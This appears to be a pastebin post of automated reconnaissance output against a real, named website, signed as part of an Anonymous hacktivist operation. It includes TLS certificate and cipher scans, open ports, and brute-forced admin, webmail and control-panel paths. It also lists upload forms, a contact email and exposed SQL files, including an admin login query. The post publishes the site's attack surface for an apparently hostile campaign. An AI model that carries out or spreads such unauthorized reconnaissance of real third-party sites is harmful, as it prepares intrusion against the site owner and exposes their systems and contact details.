- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking cookie attributes on glmasonica.com...
- Set-Cookie: projector=0ea8bbc3426586fe0d4e2372714cf441; path=/
- + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginSessionRenegotiation
- PluginHSTS
- PluginHeartbleed
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- glmasonica.com:443 => 192.252.149.45:443
- SCAN RESULTS FOR GLMASONICA.COM:443 - 192.252.149.45:443
- --------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: a7aea2027082ba92402a9ea0fe1cb9cf36134a9f
- Common Name: server308.com
- Issuer: Let's Encrypt Authority X3
- Serial Number: 036C4ABFF2559BE25A7E96F14E6764FEE474
- Not Before: Mar 4 07:30:28 2018 GMT
- Not After: Jun 2 07:30:28 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['server308.com', 'www.server308.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match glmasonica.com
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['server308.com', "Let's Encrypt Authority X3"]
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 9.64 S
- ------------------------
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 192.252.149.45
- Testing SSL server glmasonica.com on port 443 using SNI name glmasonica.com
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: server308.com
- Altnames: DNS:server308.com, DNS:www.server308.com
- Issuer: Let's Encrypt Authority X3
- Not valid before: Mar 4 07:30:28 2018 GMT
- Not valid after: Jun 2 07:30:28 2018 GMT
- #######################################################################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #######################################################################################################################################
- I, [2018-04-15T22:48:14.755835 #20153] INFO -- : Initiating port scan
- I, [2018-04-15T22:55:51.933080 #20153] INFO -- : Using nmap scan output file logs/nmap_output_2018-04-15_22-48-14.xml
- I, [2018-04-15T22:55:51.972547 #20153] INFO -- : Discovered open port: 192.252.149.45:80
- I, [2018-04-15T22:55:53.785944 #20153] INFO -- : Discovered open port: 192.252.149.45:443
- I, [2018-04-15T22:55:57.648350 #20153] INFO -- : Discovered open port: 192.252.149.45:993
- I, [2018-04-15T22:56:01.484324 #20153] INFO -- : Discovered open port: 192.252.149.45:995
- I, [2018-04-15T22:56:05.310305 #20153] INFO -- : <<<Enumerating vulnerable applications>>>
- #######################################################################################################################################
- Scan date: 15-4-2018 22:9:2
- =======================================================================================================================================
- | Domain: http://glmasonica.com/
- | Server: Apache
- | IP: 192.252.149.45
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://glmasonica.com/admin/
- | [+] CODE: 302 URL: http://glmasonica.com/ajax/
- | [+] CODE: 200 URL: http://glmasonica.com/contact/
- | [+] CODE: 200 URL: http://glmasonica.com/data/
- | [+] CODE: 200 URL: http://glmasonica.com/cp/
- | [+] CODE: 200 URL: http://glmasonica.com/faq/
- | [+] CODE: 200 URL: http://glmasonica.com/index/
- | [+] CODE: 200 URL: http://glmasonica.com/logs/
- | [+] CODE: 200 URL: http://glmasonica.com/modules/
- | [+] CODE: 200 URL: http://glmasonica.com/temp/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://glmasonica.com/admin/index.php
- | [+] CODE: 200 URL: http://glmasonica.com/cp/rac/nsManager.cgi
- | [+] CODE: 200 URL: http://glmasonica.com/faq.php
- | [+] CODE: 200 URL: http://glmasonica.com/index.php
- | [+] CODE: 200 URL: http://glmasonica.com/webmail/lib/emailreader_execute_on_each_page.inc.php
- | [+] CODE: 200 URL: http://glmasonica.com/webmail/blank.html
- | [+] CODE: 200 URL: http://glmasonica.com/webmail/horde/test.php
- | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/read_body.php
- | [+] CODE: 200 URL: http://glmasonica.com/webmail/src/configtest.php
- =======================================================================================================================================
- |
- | Check robots.txt:
- |
- | Check sitemap.xml:
- ======================================================================================================================================
- |
- | Crawler Started:
- | Plugin name: E-mail Detection v.1.1 Loaded.
- | Plugin name: phpinfo() Disclosure v.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: FCKeditor upload test v.1 Loaded.
- | Plugin name: Upload Form Detect v.1.1 Loaded.
- | Plugin name: External Host Detect v.1.2 Loaded.
- | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
- | Plugin name: Code Disclosure v.1.1 Loaded.
- | [+] Max Requests: 15000
- | [+] Crawling finished, 86011 URL's found!
- |
- | E-mails:
- | [+] E-mail Found: glmasonica@intnet.mu
- |
- | PHPinfo() Disclosure:
- |
- | Timthumb:
- |
- | FCKeditor File Upload:
- |
- | File Upload Forms:
- | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.categories.add.tpl.html
- | [+] Upload Form Found: http://glmasonica.com/display/interfaces/forms.membersimage.update.tpl.html
- |
- | External hosts:
- | [+] External Host Found: https://cp.server308.com
- |
- | Web Backdoors:
- |
- | Source Code Disclosure:
- |
- | Ignored Files:
- | http://glmasonica.com/data/sql/categories_add.sql
- | http://glmasonica.com/data/sql/setup_maincategories.sql
- | http://glmasonica.com/data/sql/z_cms_updateContentbyID.sql
- | http://glmasonica.com/data/sql/cms_createContent.sql
- | http://glmasonica.com/data/sql/cms_listPages.sql
- | http://glmasonica.com/data/sql/cms_getPageData_all.sql
- | http://glmasonica.com/data/sql/categories_list.sql
- | http://glmasonica.com/data/sql/cms_getContent.sql
- | http://glmasonica.com/data/sql/admin_login.sql
- =======================================================================================================================================
- #####################################################################################################################################
- Anonymous JTSEC #OPkilluminatie full recon #18
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement